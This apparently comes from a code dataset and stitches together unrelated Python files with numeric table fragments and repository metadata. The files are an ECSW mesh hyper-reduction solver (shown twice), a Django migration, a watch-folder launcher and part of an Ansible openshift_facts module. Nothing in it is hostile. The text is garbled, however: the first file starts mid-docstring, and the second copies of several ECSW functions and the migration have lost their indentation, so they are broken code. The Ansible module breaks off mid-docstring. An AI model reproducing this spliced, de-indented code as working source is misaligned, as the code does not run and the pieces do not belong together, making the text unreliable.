Energy Conserving Sampling and Weighting (ECSW) hyper reduction.

ECSW speeds up reduced nonlinear models by assembling only a small, weighted
subset of mesh elements instead of the full mesh. The element weights are
determined from training snapshots by a sparse non-negative least-squares
problem (see :func:`sparse_nnls`), such that the reduced internal force of
the sampled mesh matches that of the full mesh up to a given tolerance.
"""
import logging
import numpy as np
from scipy.linalg import solve as linsolve
from scipy.sparse import csc_matrix
from .ecsw_assembly import EcswAssembly
__all__ = ['sparse_nnls',
'ecsw_assemble_G_and_b',
'ecsw_get_weights_by_component',
'EcswAssembly']
def sparse_nnls(G, b, tau, conv_stats=True):
    r"""
    Run the sparse NNLS-solver in order to find a sparse vector xi satisfying

    .. math::
        || G \xi - b ||_2 \leq \tau ||b||_2 \quad\text{with}\quad \min||\xi||_0

    Parameters
    ----------
    G : ndarray, shape: (n*m, no_of_elements)
        force contribution matrix
    b : ndarray, shape: (n*m)
        force contribution vector
    tau : float
        tolerance
    conv_stats : bool
        Flag for setting, that more detailed output is produced with
        convergence information.

    Returns
    -------
    x : csc_matrix
        sparse vector containing the weights
    stats : ndarray
        Infos about the convergence of the system. The first column shows the
        size of the active set, the second column the residual. If conv_stats
        is set to False, an empty array is returned.

    References
    ----------
    .. [1] C. L. Lawson and R. J. Hanson. Solving least squares problems,
           volume 15. SIAM, 1995.
    .. [2] T. Chapman, P. Avery, P. Collins, and C. Farhat. Accelerated mesh
           sampling for the hyper reduction of nonlinear computational models.
           International Journal for Numerical Methods in Engineering, 2016.
    """
    # Logger lookup is loop-invariant; hoist it out of the iteration.
    logger = logging.getLogger('amfe.hyper_red.ecsw.snnls')
    no_of_elements = G.shape[1]
    norm_b = np.linalg.norm(b)
    r = b
    xi = np.zeros(no_of_elements)  # the resulting vector
    zeta = np.zeros(no_of_elements)  # the trial vector which is iterated over
    # Boolean active set; allows quick and easy indexing through masking with
    # high performance at the same time
    active_set = np.zeros(no_of_elements, dtype=bool)
    stats = []
    while np.linalg.norm(r) > tau * norm_b:
        # Greedy step: add the element whose column correlates best with the
        # current residual.
        mu = G.T @ r
        idx = np.argmax(mu)
        if active_set[idx]:
            # Fixed: the original message never applied .format(idx).
            raise RuntimeError('snnls: The index {} has already been added '
                               'and is considered to be the best again.'.format(idx))
        active_set[idx] = True
        logger.debug('Added element {}'.format(idx))
        while True:
            # Trial vector zeta is solved for the unconstrained least-squares
            # problem restricted to the active set.
            zeta[~active_set] = 0.0
            G_red = G[:, active_set]
            zeta[active_set] = linsolve(G_red.T @ G_red, G_red.T @ b)
            # If the trial solution is fully non-negative, accept it.
            if np.min(zeta[active_set]) >= 0.0:
                xi[:] = zeta[:]
                break
            # Otherwise step from xi towards zeta only as far as feasible and
            # drop the first active element that hits the zero bound.
            mask = np.logical_and(zeta <= 0.0, active_set)
            # Compute the feasibility ratios once (the original evaluated the
            # same expression twice for argmin and min).
            ratios = xi[mask] / (xi[mask] - zeta[mask])
            ele_const = np.argmin(ratios)
            const_idx = np.where(mask)[0][ele_const]
            logger.debug('Remove element {} violating the constraint.'.format(const_idx))
            # Amplify xi with the difference of zeta and xi such, that the
            # largest mismatching negative point becomes zero.
            alpha = ratios[ele_const]
            xi += alpha * (zeta - xi)
            # Deactivate explicitly: testing xi != 0 is unreliable under
            # floating point roundoff.
            active_set[const_idx] = False
        r = b - G[:, active_set] @ xi[active_set]
        logger.debug("snnls: residual {} No of active elements: {}".format(np.linalg.norm(r), len(np.where(xi)[0])))
        if conv_stats:
            stats.append((len(np.where(xi)[0]), np.linalg.norm(r)))
    # Assemble the sparse result. Derive indices and data from the same
    # active-set mask so both arrays are guaranteed to have equal length
    # (np.where(xi) could disagree if a weight is exactly zero).
    indices = np.where(active_set)[0]
    xi_red = xi[indices]
    indptr = np.array([0, len(xi_red)])
    x = csc_matrix((xi_red, indices, indptr), shape=(G.shape[1], 1))
    if conv_stats and not stats:
        stats.append((0, np.linalg.norm(r)))
    stats = np.array(stats)
    return x, stats
def ecsw_assemble_G_and_b(component, S, W, timesteps=None):
    """
    Build the ECSW element contribution matrix G and target vector b.

    Needed for cubature-based hyper reduction methods such as ECSW: each
    column of G holds the projected internal force contribution of one
    element, evaluated for every snapshot.

    Parameters
    ----------
    component : amfe.MeshComponent
        component to assemble; if a reduction basis is used, it must already
        be applied to this component
    S : ndarray, shape (no_of_dofs, no_of_snapshots)
        snapshots gathered as column vectors
    W : ndarray
        projection matrix
    timesteps : ndarray, shape (no_of_snapshots,), optional
        timesteps at which the snapshots were generated (relevant for
        time-dependent constraints); defaults to zeros

    Returns
    -------
    G : ndarray, shape (n*m, no_of_elements)
        per-element internal force contributions on the basis W
    b : ndarray, shape (n*m,)
        row-wise sum of G (total force contribution)

    Note
    ----
    Works on constrained variables.
    """
    logger = logging.getLogger('amfe.hyper_red.ecsw.ecsw_assemble_G_and_b')
    if timesteps is None:
        timesteps = np.zeros(S.shape[1], dtype=float)

    n_dofs, n_snapshots = S.shape
    n_reduced = W.shape[1]
    n_elements = component.no_of_elements
    logger.info('Start building large selection matrix G. In total {0:d} elements are treated:'.format(
        n_elements))

    G = np.zeros((n_reduced * n_snapshots, n_elements))

    # Temporarily swap in an assembly that only weights a single element, so
    # f_int returns per-element contributions; restored before returning.
    previous_assembly = component.assembly
    single_element_assembly = EcswAssembly([], [])
    single_element_assembly.weights = [1.0]
    component.assembly = single_element_assembly

    # Velocities are zero for all snapshot evaluations.
    dq = np.zeros(n_dofs)

    for element_no in range(n_elements):
        # Point the one-element assembly at the current element.
        single_element_assembly.indices = [element_no]
        logger.debug('Assemble element {:10d} / {:10d}'.format(element_no + 1, n_elements))
        for snapshot_no, (snapshot_vector, t) in enumerate(zip(S.T, timesteps)):
            rows = slice(snapshot_no * n_reduced, (snapshot_no + 1) * n_reduced)
            G[rows, element_no] = W.T @ component.f_int(snapshot_vector, dq, t)

    b = G.sum(axis=1)

    # Restore the original assembly of the component.
    component.assembly = previous_assembly
    return G, b
def ecsw_get_weights_by_component(component, S, W, timesteps=None, tau=0.001, conv_stats=True):
    """
    Compute ECSW weights for the given MeshComponent.

    Parameters
    ----------
    component : amfe.MeshComponent
        component to reduce
    S : ndarray, shape (no_of_dofs, no_of_snapshots)
        training snapshots as column vectors
    W : ndarray
        projection basis
    timesteps : ndarray, optional
        timesteps of the training snapshots; zeros if None
    tau : float
        tolerance of the ECSW reduction
    conv_stats : bool
        whether convergence statistics shall be collected

    Returns
    -------
    weights : ndarray
        ECSW weights
    indices : ndarray
        row based indices of elements with non-zero weights
    stats : ndarray
        convergence stats of the snnls solver
    """
    if timesteps is None:
        timesteps = np.zeros(S.shape[1], dtype=float)
    # Assemble the training system from the snapshots, then solve for weights.
    G, b = ecsw_assemble_G_and_b(component, S, W, timesteps)
    return ecsw_get_weights_by_G_and_b(G, b, tau, conv_stats)
def ecsw_get_weights_by_G_and_b(G, b, tau, conv_stats):
    """Solve the sparse NNLS problem for G and b and unpack the result.

    Returns the non-zero weights, their element indices and the solver's
    convergence statistics.
    """
    solution, stats = sparse_nnls(G, b, tau, conv_stats)
    return solution.data, solution.indices, stats
| 33.717131 | 141 | 0.631455 |
import logging
import numpy as np
from scipy.linalg import solve as linsolve
from scipy.sparse import csc_matrix
from .ecsw_assembly import EcswAssembly
__all__ = ['sparse_nnls',
'ecsw_assemble_G_and_b',
'ecsw_get_weights_by_component',
'EcswAssembly']
def sparse_nnls(G, b, tau, conv_stats=True):
    """
    Sparse non-negative least squares solver (active-set method in the style
    of Lawson/Hanson NNLS) with early termination.

    Approximately solves ``min ||G @ x - b||`` subject to ``x >= 0``,
    stopping as soon as the residual drops below ``tau * ||b||``, which keeps
    the solution vector sparse.

    Parameters
    ----------
    G : ndarray, shape (m, no_of_elements)
        system matrix
    b : ndarray, shape (m,)
        right hand side
    tau : float
        relative residual tolerance for early termination
    conv_stats : bool, optional
        if True, collect one (no_of_active_elements, residual) pair per
        outer iteration

    Returns
    -------
    x : scipy.sparse.csc_matrix, shape (no_of_elements, 1)
        sparse non-negative solution vector
    stats : ndarray
        collected convergence statistics (empty array if conv_stats is False)

    Raises
    ------
    RuntimeError
        if the same element is selected twice, indicating stagnation
    """
    no_of_elements = G.shape[1]
    norm_b = np.linalg.norm(b)
    r = b
    xi = np.zeros(no_of_elements)    # current feasible (non-negative) iterate
    zeta = np.zeros(no_of_elements)  # unconstrained trial solution on the active set
    # Boolean active set; allows quick and easy indexing through masking with
    # high performance at the same time.
    active_set = np.zeros(no_of_elements, dtype=bool)
    stats = []
    while np.linalg.norm(r) > tau * norm_b:
        # Greedily add the element correlating most with the residual.
        mu = G.T @ r
        idx = np.argmax(mu)
        if active_set[idx]:
            # Bug fix: the original message contained a bare '{}' that was
            # never interpolated with the offending index.
            raise RuntimeError('snnls: The index {} has already been added '
                               'and is considered to be the best again.'.format(idx))
        active_set[idx] = True
        print('Added element {}'.format(idx))
        while True:
            # Solve the unconstrained least squares problem restricted to the
            # active set (normal equations).
            zeta[~active_set] = 0.0
            G_red = G[:, active_set]
            zeta[active_set] = linsolve(G_red.T @ G_red, G_red.T @ b)
            # If the trial solution is fully non-negative, accept it.
            if np.min(zeta[active_set]) >= 0.0:
                xi[:] = zeta[:]
                break
            # Otherwise find the active element violating the non-negativity
            # constraint the most ...
            mask = np.logical_and(zeta <= 0.0, active_set)
            ele_const = np.argmin(xi[mask] / (xi[mask] - zeta[mask]))
            const_idx = np.where(mask)[0][ele_const]
            print('Remove element {} '.format(const_idx) +
                  'violating the constraint.')
            # ... and step from xi towards zeta just far enough that this
            # component becomes exactly zero.
            alpha = np.min(xi[mask] / (xi[mask] - zeta[mask]))
            xi += alpha * (zeta - xi)
            # Deactivate explicitly instead of recomputing `xi != 0`, since
            # floating point roundoff could leave tiny non-zero residue.
            active_set[const_idx] = False
        r = b - G[:, active_set] @ xi[active_set]
        logger = logging.getLogger('amfe.hyper_red.ecsw.snnls')
        logger.debug("snnls: residual {} No of active elements: {}".format(np.linalg.norm(r), len(np.where(xi)[0])))
        if conv_stats:
            stats.append((len(np.where(xi)[0]), np.linalg.norm(r)))
    indices = np.where(xi)[0]  # strip the tuple returned by np.where()
    xi_red = xi[active_set]
    indptr = np.array([0, len(xi_red)])
    x = csc_matrix((xi_red, indices, indptr), shape=(G.shape[1], 1))
    if conv_stats and not stats:
        # Converged immediately; record the initial residual once.
        stats.append((0, np.linalg.norm(r)))
    stats = np.array(stats)
    return x, stats
def ecsw_assemble_G_and_b(component, S, W, timesteps=None):
logger = logging.getLogger('amfe.hyper_red.ecsw.ecsw_assemble_G_and_b')
if timesteps is None:
timesteps = np.zeros(S.shape[1], dtype=float)
no_of_dofs, no_of_snapshots = S.shape
no_of_reduced_dofs = W.shape[1]
no_of_elements = component.no_of_elements
logger.info('Start building large selection matrix G. In total {0:d} elements are treated:'.format(
no_of_elements))
G = np.zeros((no_of_reduced_dofs*no_of_snapshots, no_of_elements))
old_assembly = component.assembly
g_assembly = EcswAssembly([], [])
component.assembly = g_assembly
g_assembly.weights = [1.0]
dq = np.zeros(no_of_dofs)
for element_no in range(no_of_elements):
g_assembly.indices = [element_no]
logger.debug('Assemble element {:10d} / {:10d}'.format(element_no+1, no_of_elements))
for snapshot_number, (snapshot_vector, t) in enumerate(zip(S.T, timesteps)):
G[snapshot_number*no_of_reduced_dofs:(snapshot_number+1)*no_of_reduced_dofs, element_no] = W.T @ component.f_int(snapshot_vector,
dq, t)
b = np.sum(G, axis=1)
component.assembly = old_assembly
return G, b
def ecsw_get_weights_by_component(component, S, W, timesteps=None, tau=0.001, conv_stats=True):
if timesteps is None:
timesteps = np.zeros(S.shape[1], dtype=float)
G, b = ecsw_assemble_G_and_b(component, S, W, timesteps)
weights, indices, stats = ecsw_get_weights_by_G_and_b(G, b, tau, conv_stats)
return weights, indices, stats
def ecsw_get_weights_by_G_and_b(G, b, tau, conv_stats):
x, stats = sparse_nnls(G, b, tau, conv_stats)
indices = x.indices
weights = x.data
return weights, indices, stats
| true | true |
1c2c8ddf97baa004278da14041b5822beda019fc | 740 | py | Python | cobl/lexicon/migrations/0120_auto_20161019_1545.py | Bibiko/CoBL-public | 5092a0d01b7a13565c7da6bf2f6c52d648a2debe | [
"BSD-2-Clause"
] | 3 | 2017-05-30T04:40:43.000Z | 2019-04-25T14:54:54.000Z | cobl/lexicon/migrations/0120_auto_20161019_1545.py | Bibiko/CoBL-public | 5092a0d01b7a13565c7da6bf2f6c52d648a2debe | [
"BSD-2-Clause"
] | null | null | null | cobl/lexicon/migrations/0120_auto_20161019_1545.py | Bibiko/CoBL-public | 5092a0d01b7a13565c7da6bf2f6c52d648a2debe | [
"BSD-2-Clause"
] | 3 | 2018-07-02T13:42:12.000Z | 2019-05-17T13:11:13.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter CognateClass.proposedAsCognateToScale to a five-level scale.

    Auto-generated Django migration: redefines the field as an IntegerField
    defaulting to 0, with fixed choices from 'small minority view' (0) up to
    'large majority view' (4).
    """

    # Must be applied after the loanSourceId removal in migration 0119.
    dependencies = [
        ('lexicon', '0119_remove_cognateclass_loansourceid'),
    ]

    operations = [
        migrations.AlterField(
            model_name='cognateclass',
            name='proposedAsCognateToScale',
            # NOTE: choice labels are bytestrings (b'...'), kept exactly as
            # generated so Django does not detect a spurious state change.
            field=models.IntegerField(
                default=0,
                choices=[(0, b'1/6=small minority view'),
                         (1, b'2/6=sig. minority view'),
                         (2, b'3/6=50/50 balance'),
                         (3, b'4/6=small majority view'),
                         (4, b'5/6=large majority view')]),
        ),
    ]
| 28.461538 | 61 | 0.518919 |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lexicon', '0119_remove_cognateclass_loansourceid'),
]
operations = [
migrations.AlterField(
model_name='cognateclass',
name='proposedAsCognateToScale',
field=models.IntegerField(
default=0,
choices=[(0, b'1/6=small minority view'),
(1, b'2/6=sig. minority view'),
(2, b'3/6=50/50 balance'),
(3, b'4/6=small majority view'),
(4, b'5/6=large majority view')]),
),
]
| true | true |
1c2c8eb6ba2fb4178d3ed64ed477ad73d3a1a5ea | 887 | py | Python | watchfolders.py | leith-bartrich/fiellc | 1c02690538f442dede5d6afc8926355cb2ac838e | [
"MIT"
] | null | null | null | watchfolders.py | leith-bartrich/fiellc | 1c02690538f442dede5d6afc8926355cb2ac838e | [
"MIT"
] | null | null | null | watchfolders.py | leith-bartrich/fiellc | 1c02690538f442dede5d6afc8926355cb2ac838e | [
"MIT"
] | null | null | null | from fiepipedesktoplib.gitstorage.shells import Shell as AssetShell, ContainerIDVariableCommand, AssetIDVarCommand, \
RootIDVarCommand
from fiepipedesktoplib.watchfolder.shell.watchfolder import WatchFolderShellApplication as WatcherShell
_CONTAINER_ID = "9341cf7f-5f48-4971-aece-a5f203c23076"
_ROOT_ID = "e00a2013-9041-4570-bc88-ac31bcd3e36e"
_ASSET_ID = "aadc8b52-afa1-4525-a182-40841d2baa54"
def _get_asset_shell() -> AssetShell:
    """Build the AssetShell pinned to the module's hard-coded container,
    root and asset IDs."""
    return AssetShell(ContainerIDVariableCommand(_CONTAINER_ID),
                      RootIDVarCommand(_ROOT_ID),
                      AssetIDVarCommand(_ASSET_ID))
def get_watcher_shell() -> WatcherShell:
    """Return a watch-folder shell wrapping the configured asset shell."""
    asset_shell = _get_asset_shell()
    return WatcherShell(asset_shell)
def docs():
    """Start watching the documents folder via the watcher shell."""
    get_watcher_shell().onecmd("start_documents")
def icloud():
    """Start watching the iCloud folder via the watcher shell."""
    get_watcher_shell().onecmd("start_icloud")
| 30.586207 | 117 | 0.78805 | from fiepipedesktoplib.gitstorage.shells import Shell as AssetShell, ContainerIDVariableCommand, AssetIDVarCommand, \
RootIDVarCommand
from fiepipedesktoplib.watchfolder.shell.watchfolder import WatchFolderShellApplication as WatcherShell
_CONTAINER_ID = "9341cf7f-5f48-4971-aece-a5f203c23076"
_ROOT_ID = "e00a2013-9041-4570-bc88-ac31bcd3e36e"
_ASSET_ID = "aadc8b52-afa1-4525-a182-40841d2baa54"
def _get_asset_shell() -> AssetShell:
cont_var = ContainerIDVariableCommand(_CONTAINER_ID)
root_var = RootIDVarCommand(_ROOT_ID)
asset_var = AssetIDVarCommand(_ASSET_ID)
return AssetShell(cont_var, root_var, asset_var)
def get_watcher_shell() -> WatcherShell:
return WatcherShell(_get_asset_shell())
def docs():
shell = get_watcher_shell()
shell.onecmd("start_documents")
def icloud():
shell = get_watcher_shell()
shell.onecmd("start_icloud")
| true | true |
1c2c91a5ae3808e2dbe2282c8d8978e7e8dc1c85 | 100,045 | py | Python | roles/openshift_facts/library/openshift_facts.py | sqtran/openshift-ansible | b06a457440aa929959164ecfc11ce9edf86bdc6a | [
"Apache-2.0"
] | null | null | null | roles/openshift_facts/library/openshift_facts.py | sqtran/openshift-ansible | b06a457440aa929959164ecfc11ce9edf86bdc6a | [
"Apache-2.0"
] | null | null | null | roles/openshift_facts/library/openshift_facts.py | sqtran/openshift-ansible | b06a457440aa929959164ecfc11ce9edf86bdc6a | [
"Apache-2.0"
] | 1 | 2020-12-02T00:39:02.000Z | 2020-12-02T00:39:02.000Z | #!/usr/bin/python
# pylint: disable=too-many-lines
# -*- coding: utf-8 -*-
# Reason: Disable pylint too-many-lines because we don't want to split up this file.
# Status: Permanently disabled to keep this module as self-contained as possible.
"""Ansible module for retrieving and setting openshift related facts"""
# pylint: disable=no-name-in-module, import-error, wrong-import-order
import copy
import errno
import json
import re
import io
import os
import yaml
import struct
import socket
from distutils.util import strtobool
from distutils.version import LooseVersion
from ansible.module_utils.six import string_types, text_type
from ansible.module_utils.six.moves import configparser
# ignore pylint errors related to the module_utils import
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import
# import module snippets
from ansible.module_utils.basic import * # noqa: F403
from ansible.module_utils.facts import * # noqa: F403
from ansible.module_utils.urls import * # noqa: F403
from ansible.module_utils.six import iteritems, itervalues
from ansible.module_utils.six.moves.urllib.parse import urlparse, urlunparse
from ansible.module_utils._text import to_native
HAVE_DBUS = False
try:
from dbus import SystemBus, Interface
from dbus.exceptions import DBusException
HAVE_DBUS = True
except ImportError:
pass
DOCUMENTATION = '''
---
module: openshift_facts
short_description: Cluster Facts
author: Jason DeTiberus
requirements: [ ]
'''
EXAMPLES = '''
'''
def migrate_docker_facts(facts):
    """ Apply migrations for docker facts

    Moves legacy 'docker_*' prefixed facts from the 'common' and 'node'
    roles into the dedicated 'docker' namespace, relocates node.portal_net
    to docker.hosted_registry_network, and normalizes log_options from a
    comma separated string into a list.

    Args:
        facts (dict): existing facts
    Returns:
        dict: the facts dict with docker facts migrated in place
    """
    renamed = {
        'common': ('additional_registries', 'insecure_registries',
                   'blocked_registries', 'options'),
        'node': ('log_driver', 'log_options'),
    }
    docker = facts.setdefault('docker', {})
    for role, params in renamed.items():
        if role not in facts:
            continue
        for param in params:
            legacy_key = 'docker_' + param
            if legacy_key in facts[role]:
                docker[param] = facts[role].pop(legacy_key)

    if 'node' in facts and 'portal_net' in facts['node']:
        docker['hosted_registry_network'] = facts['node'].pop('portal_net')

    # log_options was originally meant to be a comma separated string, but
    # we now prefer an actual list, with backward compatibility:
    if 'log_options' in docker and isinstance(docker['log_options'], string_types):
        docker['log_options'] = docker['log_options'].split(",")
    return facts
# TODO: We should add a generic migration function that takes source and destination
# paths and does the right thing rather than one function for common, one for node, etc.
def migrate_common_facts(facts):
    """ Migrate facts from various roles into common

    Moves role-scoped facts that belong in the 'common' namespace
    (currently 'portal_net' from 'node' and 'master') into facts['common'],
    removing them from the originating role.

    Args:
        facts (dict): existing facts
    Returns:
        dict: the facts dict with the params migrated into facts['common']
    """
    # Bug fix: these values must be tuples. The previous bare parenthesized
    # strings ('portal_net') made the inner loop iterate character by
    # character, so the fact was silently never migrated.
    params = {
        'node': ('portal_net',),
        'master': ('portal_net',)
    }
    if 'common' not in facts:
        facts['common'] = {}
    for role, migrating_params in params.items():
        if role in facts:
            for param in migrating_params:
                if param in facts[role]:
                    facts['common'][param] = facts[role].pop(param)
    return facts
def migrate_node_facts(facts):
    """ Migrate facts from various roles into node

    Moves 'dns_ip' from the 'common' role into facts['node'], removing it
    from the originating role.

    Args:
        facts (dict): existing facts
    Returns:
        dict: the facts dict with the params migrated into facts['node']
    """
    # Bug fix: the value must be a tuple. The previous bare parenthesized
    # string ('dns_ip') made the inner loop iterate character by character,
    # so the fact was silently never migrated.
    params = {
        'common': ('dns_ip',),
    }
    if 'node' not in facts:
        facts['node'] = {}
    for role, migrating_params in params.items():
        if role in facts:
            for param in migrating_params:
                if param in facts[role]:
                    facts['node'][param] = facts[role].pop(param)
    return facts
def migrate_hosted_facts(facts):
    """ Apply migrations for master facts

    Moves legacy master.router_selector / master.registry_selector into
    hosted.router.selector / hosted.registry.selector. The 'hosted'
    namespace is only created when one of the legacy keys is present.
    """
    relocations = (('router_selector', 'router'),
                   ('registry_selector', 'registry'))
    if 'master' in facts:
        master = facts['master']
        for legacy_key, component in relocations:
            if legacy_key in master:
                hosted = facts.setdefault('hosted', {})
                hosted.setdefault(component, {})['selector'] = master.pop(legacy_key)
    return facts
def migrate_admission_plugin_facts(facts):
    """ Apply migrations for admission plugin facts

    Folds the legacy master.kube_admission_plugin_config into
    master.admission_plugin_config (non-destructively merged via
    merge_facts) and drops the legacy key.
    """
    master = facts.get('master', {})
    if 'kube_admission_plugin_config' in master:
        if 'admission_plugin_config' not in master:
            master['admission_plugin_config'] = dict()
        # Merge existing kube_admission_plugin_config with admission_plugin_config.
        master['admission_plugin_config'] = merge_facts(master['admission_plugin_config'],
                                                        master['kube_admission_plugin_config'],
                                                        additive_facts_to_overwrite=[],
                                                        protected_facts_to_overwrite=[])
        # Remove the legacy fact.
        master.pop('kube_admission_plugin_config', None)
    return facts
def migrate_local_facts(facts):
    """ Apply all migrations of local facts to a deep copy of facts """
    migrated = copy.deepcopy(facts)
    # Order matters: e.g. docker migration pops node.portal_net before the
    # common migration runs.
    for migration in (migrate_docker_facts,
                      migrate_common_facts,
                      migrate_node_facts,
                      migrate_hosted_facts,
                      migrate_admission_plugin_facts):
        migrated = migration(migrated)
    return migrated
def first_ip(network):
    """ Return the first IPv4 address in network

    Args:
        network (str): network in CIDR format, e.g. '172.30.0.0/16'
    Returns:
        str: first IPv4 address in the network
    """
    def ip_to_int(addr):
        # inet_aton also accepts a bare number such as '16', parsing it as a
        # 32-bit value -- which is exactly what the CIDR suffix needs here.
        return struct.unpack("!I", socket.inet_aton(addr))[0]

    def int_to_ip(value):
        return socket.inet_ntoa(struct.pack("!I", value))

    address, prefix_len = network.split('/')
    netmask = (0xffffffff << (32 - ip_to_int(prefix_len))) & 0xffffffff
    return int_to_ip((ip_to_int(address) & netmask) + 1)
def hostname_valid(hostname):
    """ Test if specified hostname should be considered valid

    Args:
        hostname (str): hostname to test
    Returns:
        bool: True if valid, otherwise False
    """
    if not hostname:
        return False
    if hostname.startswith('localhost') or hostname.endswith('localdomain'):
        return False
    # OpenShift will not allow a node with more than 63 chars in name.
    if len(hostname) > 63:
        return False
    return True
def choose_hostname(hostnames=None, fallback=''):
    """ Choose a hostname from the provided hostnames

    Prefers fqdns (excluding any that begin with localhost or end with
    localdomain) over ip addresses; returns the fallback if nothing valid
    is found.

    Args:
        hostnames (list): list of hostnames
        fallback (str): default value when no valid hostname is found
    Returns:
        str: chosen hostname
    """
    if hostnames is None:
        return fallback
    ip_regex = r'\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z'
    ips = [candidate for candidate in hostnames
           if candidate is not None and isinstance(candidate, string_types)
           and re.match(ip_regex, candidate)]
    names = [candidate for candidate in hostnames
             if candidate is not None and candidate != '' and candidate not in ips]
    # Real names first, raw IP addresses only as a last resort.
    for candidate in names + ips:
        if hostname_valid(candidate):
            return candidate
    return fallback
def query_metadata(metadata_url, headers=None, expect_json=False):
    """ Return metadata from the provided metadata_url

    Args:
        metadata_url (str): metadata url
        headers (dict): headers to set for metadata request
        expect_json (bool): does the metadata_url return json
    Returns:
        dict or list: parsed json, or the response split into stripped lines
    Raises:
        OpenShiftFactsMetadataUnavailableError: on any non-200 response
    """
    response, info = fetch_url(module, metadata_url, headers=headers)  # noqa: F405
    if info['status'] != 200:
        raise OpenShiftFactsMetadataUnavailableError("Metadata unavailable")
    if expect_json:
        return module.from_json(to_native(response.read()))  # noqa: F405
    return [to_native(line.strip()) for line in response.readlines()]
def walk_metadata(metadata_url, headers=None, expect_json=False):
    """ Walk the metadata tree and return a dictionary of the entire tree

    Args:
        metadata_url (str): metadata url
        headers (dict): headers to set for metadata request
        expect_json (bool): does the metadata_url return json
    Returns:
        dict: the result of walking the metadata tree
    """
    metadata = dict()
    for entry in query_metadata(metadata_url, headers, expect_json):
        # A trailing slash marks a subtree to recurse into; 'public-keys/'
        # is special-cased and treated as a leaf.
        if entry.endswith('/') and not entry == 'public-keys/':
            metadata[entry[:-1]] = walk_metadata(metadata_url + entry,
                                                 headers, expect_json)
        else:
            values = query_metadata(metadata_url + entry, headers,
                                    expect_json)
            # Collapse single-element results to a scalar.
            metadata[entry] = values.pop() if len(values) == 1 else values
    return metadata
def get_provider_metadata(metadata_url, supports_recursive=False,
                          headers=None, expect_json=False):
    """ Retrieve the provider metadata

    Args:
        metadata_url (str): metadata url
        supports_recursive (bool): does the provider metadata api support
            recursion
        headers (dict): headers to set for metadata request
        expect_json (bool): does the metadata_url return json
    Returns:
        dict: the provider metadata, or None when the metadata service is
        unavailable
    """
    fetch = query_metadata if supports_recursive else walk_metadata
    try:
        return fetch(metadata_url, headers, expect_json)
    except OpenShiftFactsMetadataUnavailableError:
        return None
def normalize_gce_facts(metadata, facts):
    """ Normalize gce facts

    Args:
        metadata (dict): provider metadata
        facts (dict): facts to update
    Returns:
        dict: the result of adding the normalized metadata to the provided
              facts dict
    """
    for nic in metadata['instance']['networkInterfaces']:
        external_ips = [cfg['externalIp'] for cfg in nic['accessConfigs']]
        external_ips.extend(nic['forwardedIps'])
        network_id = nic['network'].rpartition('/')[2]
        facts['network']['interfaces'].append(dict(ips=[nic['ip']],
                                                   network_type='gce',
                                                   public_ips=external_ips,
                                                   network_id=network_id))

    facts['zone'] = metadata['instance']['zone'].rpartition('/')[2]

    # GCE currently only supports a single interface.
    primary_interface = facts['network']['interfaces'][0]
    facts['network']['ip'] = primary_interface['ips'][0]
    facts['network']['public_ip'] = primary_interface['public_ips'][0]
    # Split instance hostname from GCE metadata to use the short instance name.
    facts['network']['hostname'] = metadata['instance']['hostname'].split('.')[0]
    # TODO: attempt to resolve public_hostname
    facts['network']['public_hostname'] = facts['network']['public_ip']
    return facts
def normalize_aws_facts(metadata, facts):
    """ Normalize aws facts

    Args:
        metadata (dict): provider metadata
        facts (dict): facts to update
    Returns:
        dict: the result of adding the normalized metadata to the provided
              facts dict
    """
    interfaces_by_mac = metadata['network']['interfaces']['macs'].values()
    for nic in sorted(interfaces_by_mac, key=lambda entry: entry['device-number']):
        nic_info = dict()
        for fact_key, metadata_key in (('ips', 'local-ipv4s'),
                                       ('public_ips', 'public-ipv4s')):
            value = nic.get(metadata_key)
            # The metadata API yields either a single address or a list.
            nic_info[fact_key] = [value] if isinstance(value, string_types) else value
        if 'vpc-id' in nic:
            nic_info['network_type'] = 'vpc'
            nic_info['network_id'] = nic['subnet-id']
        else:
            nic_info['network_type'] = 'classic'
            nic_info['network_id'] = None
        facts['network']['interfaces'].append(nic_info)

    facts['zone'] = metadata['placement']['availability-zone']

    # TODO: actually attempt to determine default local and public ips
    # by using the ansible default ip fact and the ipv4-associations
    # from the ec2 metadata
    facts['network']['ip'] = metadata.get('local-ipv4')
    facts['network']['public_ip'] = metadata.get('public-ipv4')

    # TODO: verify that local and public hostnames make sense and are resolvable
    facts['network']['hostname'] = metadata.get('local-hostname')
    facts['network']['public_hostname'] = metadata.get('public-hostname')
    return facts
def normalize_openstack_facts(metadata, facts):
    """ Normalize openstack facts

    Args:
        metadata (dict): provider metadata
        facts (dict): facts to update
    Returns:
        dict: the result of adding the normalized metadata to the provided
              facts dict
    """
    # The openstack ec2 compat api does not support network interfaces and
    # the version tested on did not include the info in the openstack
    # metadata api; should be updated if neutron exposes this.
    facts['zone'] = metadata['availability_zone']
    ec2_compat = metadata['ec2_compat']
    facts['network']['ip'] = ec2_compat['local-ipv4'].split(',')[0]
    facts['network']['public_ip'] = ec2_compat['public-ipv4']

    for fact_key, host_key, ip_key in (('hostname', 'hostname', 'local-ipv4'),
                                       ('public_hostname', 'public-hostname', 'public-ipv4')):
        # Only trust the metadata hostname when it resolves back to the
        # corresponding address; otherwise fall back to the raw IP.
        try:
            resolves = socket.gethostbyname(ec2_compat[host_key]) == ec2_compat[ip_key]
        except socket.gaierror:
            resolves = False
        facts['network'][fact_key] = ec2_compat[host_key] if resolves else ec2_compat[ip_key]
    return facts
def normalize_provider_facts(provider, metadata):
    """ Normalize provider facts

    Args:
        provider (str): host provider
        metadata (dict): provider metadata
    Returns:
        dict: the normalized provider facts ({} if either input is None)
    """
    if provider is None or metadata is None:
        return {}

    # TODO: test for ipv6_enabled where possible (gce, aws do not support)
    # and configure ipv6 facts if available
    # TODO: add support for setting user_data if available
    normalized = dict(name=provider, metadata=metadata,
                      network=dict(interfaces=[], ipv6_enabled=False))
    if provider == 'gce':
        return normalize_gce_facts(metadata, normalized)
    if provider == 'aws':
        return normalize_aws_facts(metadata, normalized)
    if provider == 'openstack':
        return normalize_openstack_facts(metadata, normalized)
    # Unknown providers keep the generic skeleton.
    return normalized
def set_node_schedulability(facts):
    """ Set schedulable facts if not already present in facts dict

    Nodes that are also masters default to unschedulable; pure nodes
    default to schedulable. An existing value is left untouched.

    Args:
